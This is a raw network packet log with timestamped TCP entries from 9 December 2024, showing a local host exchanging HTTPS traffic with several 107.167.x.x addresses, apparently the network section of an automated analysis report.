                                                                                                                                            Dec 9, 2024 17:40:01.054784060 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.054799080 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.054857969 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.054866076 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.054898024 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.054919004 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.059679031 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.059695005 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.059802055 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.059813023 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.060003996 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.065439939 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.065464973 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.065546036 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.065557003 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.068492889 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.141535997 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.141567945 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.141829967 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.141846895 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.141894102 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.224359989 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.224387884 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.224500895 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.224522114 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.228050947 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.229928970 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.229963064 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.230015039 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.230022907 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.230047941 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.230083942 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.234828949 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.234865904 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.234941959 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.234951019 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.234968901 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.234994888 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.240181923 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.240211010 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.240259886 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.240267992 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.240305901 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.240322113 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.245718956 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.245742083 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.245834112 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.245842934 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.248014927 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.251101971 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.251126051 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.251213074 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.251220942 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.251238108 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.251271963 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.256287098 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.256309986 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.256403923 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.256413937 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.256429911 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.256458044 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.333573103 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.333604097 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.333714962 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.333730936 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.334027052 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.417494059 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.417526007 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.417670965 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.417690039 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.417984962 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.421869040 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.421891928 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.421953917 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.421969891 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.426002979 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.426740885 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.426769972 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.426824093 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.426840067 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.426851034 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.426959038 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.432524920 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.432554960 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.432626009 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.432643890 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.432674885 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.433989048 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.437668085 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.437696934 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.437762022 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.437784910 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.437824965 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.437824965 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.442725897 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.442749977 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.442802906 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.442821026 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.442857027 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.442857027 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.448281050 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.448306084 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.448379040 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.448379040 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.448398113 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.448432922 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.525665998 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.525696039 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.525770903 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.525793076 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.526001930 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.608886003 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.608911037 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.608994961 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.609009981 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.609021902 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.609065056 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.614289045 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.614315033 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.614388943 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.614398003 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.614413023 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.614444971 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.619143963 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.619170904 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.619223118 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.619230032 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.619275093 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.619275093 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.624589920 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.624604940 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.624663115 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.624674082 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.625514030 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.630075932 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.630099058 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.630153894 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.630163908 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.630172968 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.630234957 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.635380983 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.635410070 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.635452032 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.635472059 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.635483980 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.635623932 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.640774012 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.640800953 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.640862942 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.640872002 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.640889883 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.641987085 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.718184948 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.718211889 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.718278885 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.718298912 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.718341112 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.718373060 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.800957918 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.800983906 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.801052094 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.801083088 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.801192999 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.806165934 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.806190014 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.806245089 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.806262016 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.806322098 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.811062098 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.811089039 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.811134100 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.811145067 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.811173916 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.811193943 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.817333937 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.817357063 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.817403078 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.817425966 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.817467928 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.817467928 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.821893930 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.821913958 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.821975946 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.821993113 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.822163105 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.827517986 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.827534914 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.827608109 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.827641010 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.827845097 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.832550049 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.832566977 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.832628012 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.832643986 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.832721949 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.918215990 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.918243885 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.918405056 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:01.918421984 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:01.918466091 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:02.002412081 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:02.002439976 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:02.002561092 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:02.002580881 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:02.002646923 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:02.007628918 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:02.007654905 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:02.007751942 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:02.007766008 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:02.007853031 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:02.013191938 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:02.013217926 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:02.013290882 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:02.013307095 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:02.013365984 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:02.018074036 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:02.018141031 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:02.018162012 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:02.018198013 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:02.018342018 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:02.018663883 CET49713443192.168.2.9107.167.96.30
                                                                                                                                            Dec 9, 2024 17:40:02.018686056 CET44349713107.167.96.30192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:05.211908102 CET49714443192.168.2.9107.167.96.39
                                                                                                                                            Dec 9, 2024 17:40:05.211945057 CET44349714107.167.96.39192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:05.212018967 CET49714443192.168.2.9107.167.96.39
                                                                                                                                            Dec 9, 2024 17:40:05.213499069 CET49715443192.168.2.9107.167.96.38
                                                                                                                                            Dec 9, 2024 17:40:05.213543892 CET44349715107.167.96.38192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:05.213617086 CET49715443192.168.2.9107.167.96.38
                                                                                                                                            Dec 9, 2024 17:40:05.236277103 CET49714443192.168.2.9107.167.96.39
                                                                                                                                            Dec 9, 2024 17:40:05.236299992 CET44349714107.167.96.39192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:05.236376047 CET49715443192.168.2.9107.167.96.38
                                                                                                                                            Dec 9, 2024 17:40:05.236402988 CET44349715107.167.96.38192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:05.844213009 CET49716443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:05.844260931 CET44349716107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:05.849982023 CET49716443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:05.849982977 CET49716443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:05.850028992 CET44349716107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:06.703263044 CET44349715107.167.96.38192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:06.703356028 CET49715443192.168.2.9107.167.96.38
                                                                                                                                            Dec 9, 2024 17:40:06.704138041 CET44349714107.167.96.39192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:06.704200983 CET49714443192.168.2.9107.167.96.39
                                                                                                                                            Dec 9, 2024 17:40:07.446796894 CET49714443192.168.2.9107.167.96.39
                                                                                                                                            Dec 9, 2024 17:40:07.446824074 CET44349714107.167.96.39192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:07.446891069 CET49715443192.168.2.9107.167.96.38
                                                                                                                                            Dec 9, 2024 17:40:07.446914911 CET44349715107.167.96.38192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:07.447235107 CET44349715107.167.96.38192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:07.447336912 CET49715443192.168.2.9107.167.96.38
                                                                                                                                            Dec 9, 2024 17:40:07.447879076 CET44349714107.167.96.39192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:07.447927952 CET49714443192.168.2.9107.167.96.39
                                                                                                                                            Dec 9, 2024 17:40:07.449652910 CET49714443192.168.2.9107.167.96.39
                                                                                                                                            Dec 9, 2024 17:40:07.449996948 CET49715443192.168.2.9107.167.96.38
                                                                                                                                            Dec 9, 2024 17:40:07.491339922 CET44349715107.167.96.38192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:07.495326042 CET44349714107.167.96.39192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:07.695400000 CET44349716107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:07.695481062 CET49716443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:07.701903105 CET49716443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:07.701915026 CET44349716107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:07.702234983 CET44349716107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:07.702301025 CET49716443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:07.747855902 CET49716443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:07.747895956 CET49716443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:07.747937918 CET44349716107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:07.803215981 CET44349715107.167.96.38192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:07.803283930 CET49715443192.168.2.9107.167.96.38
                                                                                                                                            Dec 9, 2024 17:40:07.803291082 CET44349715107.167.96.38192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:07.803339005 CET49715443192.168.2.9107.167.96.38
                                                                                                                                            Dec 9, 2024 17:40:07.805737972 CET49715443192.168.2.9107.167.96.38
                                                                                                                                            Dec 9, 2024 17:40:07.805766106 CET44349715107.167.96.38192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.042385101 CET44349714107.167.96.39192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.042475939 CET44349714107.167.96.39192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.042562962 CET49714443192.168.2.9107.167.96.39
                                                                                                                                            Dec 9, 2024 17:40:08.044554949 CET49714443192.168.2.9107.167.96.39
                                                                                                                                            Dec 9, 2024 17:40:08.044578075 CET44349714107.167.96.39192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.199711084 CET44349716107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.199799061 CET49716443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:08.199816942 CET44349716107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.199882030 CET49716443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:08.199973106 CET49716443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:08.199991941 CET44349716107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.200012922 CET49716443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:08.200052977 CET49716443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:08.204634905 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:08.204690933 CET44349717107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.204773903 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:08.205008030 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:08.205022097 CET44349717107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.353538990 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:08.353585958 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.353761911 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:08.354163885 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:08.354182005 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.618891954 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:08.618938923 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.619004965 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:08.619350910 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:08.619363070 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.578104019 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.578174114 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:09.581651926 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:09.581665039 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.581893921 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.582041979 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:09.582346916 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:09.627329111 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.787844896 CET44349717107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.789637089 CET49717443192.168.2.9107.167.125.189
